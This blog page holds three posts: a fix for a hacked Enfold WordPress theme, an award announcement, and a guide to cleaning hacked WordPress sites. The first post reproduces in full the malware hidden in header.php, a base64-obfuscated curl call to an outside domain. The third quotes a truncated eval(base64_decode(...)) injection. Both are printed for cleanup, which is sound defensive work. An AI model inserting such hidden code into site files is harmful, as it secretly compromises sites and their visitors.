FIXED: Enfold theme error – sneaky connection to qdgvst.com

qdgvst.comDid your website randomly start showing a 404 not found error?  Are you using wordpress and the “Enfold” theme?  If the answer to both of these questions is yes, then this fix is for you.

The enfold theme has a sneaky bit of code on line 70 of header.php.  It’s the line where the <body> tag is written to the output.  It looks like this…

[php htmlscript=”true” wraplines=”true” firstline=”70″]
<body id="top" <?php body_class($style." ".$avia_config[‘font_stack’]." ".$blank); ?>><?php
$ch=curl_init();curl_setopt($ch,CURLOPT_URL,base64_decode(‘aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA=’));
curl_setopt($ch,CURLOPT_HEADER,0);curl_exec($ch);curl_close($ch); ?>
[/php]

Notice the base64_decode function.  After execution, it returns “http://qdgvst.com/l.php” which may look familiar.  Not to worry!  This is a simple fix!

  1. Open your wordpress admin site at http://your-site.com/wp-admin/.
  2. Log in and go to “Appearance > Editor”.
  3. On the right side of the page, make sure you have selected the “Enfold” theme.SelectTheme
  4. On the right side of the page, click on “Header – Header.php”.Header
  5. Scroll down to line 70 and add comments around the PHP CURL code.  When you are done it should look like this…
    [php htmlscript=”true” wraplines=”true” firstline=”70″]
    <body id="top" <?php body_class($style." ".$avia_config[‘font_stack’]." ".$blank); ?>><?php
    /* $ch=curl_init();curl_setopt($ch,CURLOPT_URL,base64_decode(‘aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA=’));
    curl_setopt($ch,CURLOPT_HEADER,0);curl_exec($ch);curl_close($ch); */ ?>
    [/php]
  6. Click the “Update File” button at the bottom.

Done!  Not only will this fix the ugly header showing up on your site but it should improve performance a bit as well since your theme won’t be reaching out to another server all the time.

Learning Elite award at USAA

learningelite_logo

Our learning team at USAA was recently recognized as one of CLO Magazine’s Learning Elite! Here is a little more info about the award from  their website…

Chief Learning Officer magazine’s LearningElite program honors the best organizations for learning and development. This robust, peer-reviewed ranking and benchmarking program recognizes those organizations that employ exemplary workforce development strategies that deliver significant business results. Developed under the guidance of a group of chief learning officers and senior learning and development practitioners, the LearningElite program utilizes best practices in evaluation to rank the best organizations based upon their impact, size and industries served. A comprehensive evaluation of learning and development, the LearningElite also recognizes individual companies for their efforts in functional areas, including leadership development, use of technology, executive buy-in, and content development and delivery, among others.

The aim of the LearningElite is to:

  • Identify and recognize industry leaders.
  • Promote recognition of the critical role that learning and development plays in organizational success.
  • Support organizations in achieving best-in-class levels of performance.
  • Identify and share best practices, principles and strategies for learning and development.
  • Provide powerful benchmarking data for world-class learning and development.

http://clomedia.com/learning-elite

Unhacking a Hacked WordPress Site

WordPress is pretty solid these days but every now and then, an exploit is found and taken advantage of. Recently we cleaned several websites who had all fallen prey to an exploit which modified every php file on the server.

The exploit added a malicious <script> tag to the very beginning of each php file. Since the modifications to these files were all uniform, it was fairly easy to undo the damage. The code added to each file looked something like this…

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25...    ...B9ICB9"));?>

It was a big long string of characters that made no sense until decoded.  Our solution was to use a php page that could repair the damage. Thanks to theandystratton for providing a good starting point.

You can upload this file to the root folder of your server and then visit it in a web browser.  It will first find all infected php files.  Then you can click the “Fix Files” button and the malicious code is removed for you.  If you intend to use this script, please know that we take no liability for it.  That said, our clients have had great success with it.

_repairHackedSite.php